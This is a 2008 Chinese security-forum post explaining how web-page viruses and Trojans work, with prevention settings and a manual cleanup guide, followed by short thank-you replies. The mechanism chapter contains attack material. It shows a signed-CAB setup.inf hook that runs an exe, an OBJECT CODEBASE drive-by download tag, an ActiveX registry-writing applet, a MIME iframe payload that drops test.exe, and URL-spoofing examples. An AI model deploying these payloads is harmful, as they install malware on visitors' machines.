Board logo

标题: 网页病毒、木马的机理以及手工清理思路剖析 [打印本页]

作者: s37su37    时间: 2008-7-18 17:37     标题: 网页病毒、木马的机理以及手工清理思路剖析

网页病毒、木马的机理以及手工清理思路剖析
第一章   认识网页病毒

    网页病毒是利用网页来进行破坏的病毒,它存在于网页之中,其实是使用一些SCRIPT语言编写的一些恶意代码利用IE的漏洞来实现病毒植入。。当用户登录某些含有网页病毒的网站时,网页病毒便被悄悄激活,这些病毒一旦激活,可以利用系统的一些资源进行破坏。轻则修改用户的注册表,使用户的首页、浏览器标题改变,重则可以关闭系统的很多功能,装上木马,染上病毒,使用户无法正常使用计算机系统,严重者则可以将用户的系统进行格式化。而这种网页病毒容易编写和修改,使用户防不胜防。


    一般的网络用户网页中毒的方式大致可以分为几种:

       1.无知型的:

      为什么叫无知型的,原因很简单,就是无知,接触的东西实在是太少,相对的经验就浅了很多。如  看得出这个URL中的问题了么?我想大多数人都会觉得,这很正常啊,不就是一张图片么?是,在菜鸟眼里它确实就是一张图片,孰不知http://*.yeah.net 是免费的二级域名,一个解析过的转向域名怎么能够后接文件夹路径,更别说是一张图片了.还有类URL欺骗的方式就是:http://www.sina.com.cn@e3i5.yeah.net/  知道这是什么地址么?不知道?看看吧.

       2.好奇心型:

      这类用户最是占比例算最多的吧。好奇心太强,不管是什么站点,只要有人发过来,他就一定要去看看。好,这就给QQ类的爱情森林病毒提供了一个良好的传播途径,要知道,这类病毒发消息可不经过主人同意的.

       3.无意中奖型:

       属于那种一不小心中毒的,谁也难免有失误的时候,对这类人我们表示同情.



第二章   网页病毒的机理分析

     一,网页制作方式:

   
一,JS.Exception.EXploit 说明:改注册表的首选


二,EML头 说明:早期的木马制作方式


三,iframe  说明:很常用,很多站点都是利用IFRAME的漏洞来执行木马植入。


四,.EXE to .BMP + JS.Exception.EXploit 说明:少数高手使用的方法


*五,通过安全认证的CAB , COX  说明:防不胜防的方法,我曾制作过一个,没公布,效果极好.

原理:IE读文件时会有文件读不出,就会去“升级”这样它会在网页中指定的位置找 .cab 并在系统里写入个CID读入 .cab 里的文件。
方法:.cab是WINDOWS里的压缩文件,我们知道IE里所用的安全文件是用签名的CAB也不例 外,所做的CAB是经过安全使用证书异入的。也就是说IE认证攻击,只所以每次都能入侵我的脑,是因为它通过的是IE认证下的安全攻击,这样不管我怎么做都没办法。
制作软件:1.安全证书管理。2.CAB压缩或安装盘制做先到,IE里找安全-内容,里面有证书,我们找一个就行。导出 *.CER在用证书管理打开*.CER导出证书.SPC和密钥.PVK.这样我们就可以做.cab 了。
3.建立setup.inf
[Setup Hooks]
hook1=hook1
[hook1]
run=%EXTRACT_DIR%\文件.exe

[Version]
Signature=$CHICAGO$
AdvancedInf=2.0

最重要我所用的是安装盘制做,ADD sdtup.inf OR 文件.exe,然后导入证书.SPC和密钥.PVK。

    二,网页攻击效果以及原理


    1.修改注册表

       精华语句:<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>
       最烦人的东西,随便进个站点,把你的注册表改的是乱78糟.此类网页利用的是ActiveX+JS实现的对注册表的写操作。一般的杀毒检测软件都能识别。

    2.一般类木马网页

       精华语句:
<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE= \"application/x-oleobject\"CODEBASE=\"test.exe#version=0,1,1,1\">"
<PARAM NAME=\"_Version\" value=\"65530\">"
</OBJECT>"
       html带动同路径下的一个exe的文件的主页了,也就是当浏览器浏览这个页面的时候,一个exe的文件就在后台自动下载并执行了.以现在的IE6.0以上版本,当你试图通过浏览器该网页的时候,ie的安全警告跳了出来,我想没有几个人愿意乖乖的冒着风险去点“是”,在网上通不过ie的安全策略,这个小马失败了。

    3.高级类的木马网页
      
       精华语句:Content-Type: multipart/related;
    type="multipart/alternative";
  boundary="====B===="

--====B====
Content-Type: multipart/alternative;
  boundary="====A===="

--====A====
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<iframe src=3Dcid:Mud height=3D0 width=3D0>
</iframe>
--====A====--

--====B====
Content-Type: audio/x-wav;
    name="test.exe"
Content-Transfer-Encoding: base00
Content-ID: <Mud>  ---以下省略---

      此类网页就是活活的利用的微软的一个大BUG,原本是OUTLOOK上的问题在IE上一样可行的MIME漏洞.木马可以通过这个套程序轻易的下载到本地然后在执行任意操作,如改名,生成新的文件,改注册表等等,一切可以按照制作者意愿要做的事。

      [作者注]这里给个简单的防御办法: 在注册表[HKEY-LOCAL-MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatiblity]下为[Active Setup controls]创建一个基于CLSID的新建{6E449683-C509-11CF-AAFA-00AA00 B6015C}在新建下创建REGDWORD类型的值:[Compatibility Flags 0x00000400]


第三章   网页病毒的预防手段

    ·由于该类网页是含有有害代码的ActiveX网页文件,因此在IE设置中将ActiveX插件和控件、Java脚本等全部禁止就可以避免中招。
  
  具体方法是:在IE窗口中点击"工具→Internet选项,在弹出的对话框中选择"安全"标签,再点击"自定义级别"按钮,就会弹出"安全设置"对话框,把其中所有ActiveX插件和控件以及Java相关全部选择"禁用"即可。不过,这样做在以后的网页浏览过程中可能会造成一些正常使用ActiveX的网站无法浏览。

    ·对于Windows98用户,请打开 C:\WINDOWS\JAVA\Packages\CVLV1NBB.ZIP, 把其中的“ActiveXComponent.class”删掉;对于WindowsMe用户,请打开C:\WINDOWS\JAVA\Packages\5NZVFPF1.ZIP, 把其中的"ActiveXComponent.class"删掉。请放心,删除这个组件不会影响到你正常浏览网页的.

    ·对Win2000用户,还可以通过在Win2000下把服务里面的远程注册表操作服务"Remote Registry Service"禁用,来对付该类网页。具体方法是:点击"管理工具→服务→Remote Registry Service(允许远程注册表操作)",将这一项禁用即可。

    ·升级你的IE为6.0版本并装上所有的SP以及追加的几个小补丁,可以有效防范上面这些症状。
  
  ·下载微软最新的Microsoft Windows Script 5.6

    ·安装病毒防火墙,一般的杀毒软件都自带.打开网页监控和脚本监控.


   第四章   网页病毒的清理和手工清理

      一,一般的网页病毒感染修复

         1.到“网上助手”去清理.
         2.使用杀毒软件杀毒.
         3.使用一些专杀工具查杀.
         

      二,未知网页病毒的手工处理办法


跟多的时候,我们遇到的是一些未知的网页木马,当发现自己中毒后,并不会有专业的杀毒软件或是专杀工具给大家使用。所以,我专门写了以下的手工查杀病毒的一个完整的思路,大家基本上按照以下的顺序进行操作会自行将病毒和木马"请"出自己的计算机,好下面开始:


    ⒈准备工作:
   
    下载进程管理软件:柳叶擦眼 没有的请到以下地址下载:  http://www.e3i5.com/soft/SoftView.Asp?SoftID=361
  
      进行手工杀毒的准备工作,先关闭你能关闭的所有软件,包括杀毒软件,防火墙,宽带连接等等一切能生成进程的东西.只保留必要的系统进程,这样会使以后的操作带来很多方便。

    ⒉查看系统进程:除了显示系统文件外,将所有无关的进程杀掉。

      如:查看进程表定位文件。intneter.exe    c:\windows\system\intneter.exe   这里的intneter.exe就是仿intnater.exe输入法进程加载到系统的非法进程文件,我们应马上结束这个进程,并删除对应的文件,注意一些文件是隐藏的,在查找时应用"文件夹选项"打开对隐藏文件的查看.

       如果不知道相关的进程,你可以这样尝试,

   将进程软件下载后,断网,关闭运行的软件,打开进程管理软件,软件显示的系统进程你不要理,如果你不知道你以前正常的软件进程名是什么的话,将所有非系统的进程全部杀死,(注意除了进程查看软件之外的哦,我要是不说一定有人连它一起杀了.)并记下他们的文件路径,并记录下来。发现非法的文件就立即清理,不知道是否是非法文件的暂时改名。并记录下来,以便修改。

   ⒊修改注册表
   开始 ---〉 运行  ----》 REGEDIT ----》编辑  -----》查找
   查找run和runonce,RunServices-,run-,runonce-主键下所有的键都为空,如果不为空,全部清理为空.使系统启动不加载任何程序。(一般的来说,驱动程序除了一些显示驱动会保留在启动项里,其他重要的很少了)如果你知道你常用软件所在RUN以及相关键下的值,当然更好,你就可以选择性的进行清理。对以后的整理工作会更方便些。

   ⒋清理启动项配置文件

   1.进入配置管理,除WIN 2K外都为MSCONFIG.

   开始 ---〉 运行  ----》 MSCONFIG

进入:system.ini
修改[BOOT]
shell=Explorer.exe ----》后面没东西了,再有什么,改成和前面一样的。不用多想。

进入:WIN.INI
修改[WINDOWS]
LOAD=--》这里是空的,连一个空格都没有的
NULLPORT=NONE

修改:autoexec.bat 内容为空

   WIN 2K 直接进入启动编辑器。

   修改以上三个文件.

记得这三个文件里没有任何为空的指令命令,有就删除。即去掉钩钩.任何值如果为空的话就是什么都没有,甚至于空格都不存在。有之,则改!


    ⒌清理注册表垃圾信息

      开始 ---〉 运行  ----》 REGEDIT ----》编辑  -----》查找

      将开机运行的那个站点进行找到即删除.

    ⒍清理缓存  [这点最重要]

     一定要把你的IE缓冲区清理干净,以及TEMP文件夹的临时文件和垃圾文件清理干净。

      好了,将你记录的路径的文件保存,然后重新启动计算机。

    ⒎清理校验

     1.启动计算机后,再次打开柳叶擦眼,查看进程,看除了系统进程是否还有其他进程存在。如果没有,说明手工清理完成。如果还发现异常的进程请重复以上步骤。

     2.确认杀毒完成后,你开始逐一的启动各类软件,检查你所改名的文件是否会影响到软件运行,如果没有异常发生,请删除或放入你杀毒软件的隔离区,(为什么要选择后者毕竟我们还不清楚这是不是病毒文件,即使是在隔离区的文件系统是不会再次运行的).

     [注意]做这项工作时你一定要想起你在杀进程时保存的那个进程路径列表文件,依照上面的文件逐一的进行检查.

     3.逐一恢复了所有的进程后,重新启动计算机,再做最后一次检测。以防万一。

     4.到此为止,你已经可以松口气了。整理一下你清理的过程,然后写一篇清理教程出来,帮助那些无辜的人。


    ⒏总结

     不论怎么说,经历了以上的查杀过程,必定会使你觉得网页病毒并非那么可怕,从防范到清理,我们都能很自如的由我们自己手工操作完成,这点对于新出现的网页病毒来说,应该是个很有效的解决办法.就算再遇到了类似的问题,你也许只用了第一次的时间的一半或者不到一半就解决了.动手操作和自我解决是最好途径.当然我的意思也并非完全抛弃杀毒和防毒软件,但,毕竟是个工具。俗话讲:事在人为.
作者: 東莞0769    时间: 2008-7-18 17:37

介绍的不错  谢谢
作者: zws107    时间: 2008-7-18 17:37

谢谢楼主分享.为灾区同胞们祈福!为逝去的灵魂默哀!
作者: 小滋    时间: 2008-7-18 17:37


作者: 会思考的树    时间: 2008-7-18 17:37

恩,不错,也应该出点关于网站被挂马以后的处理方法!




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./) Powered by Discuz! 7.2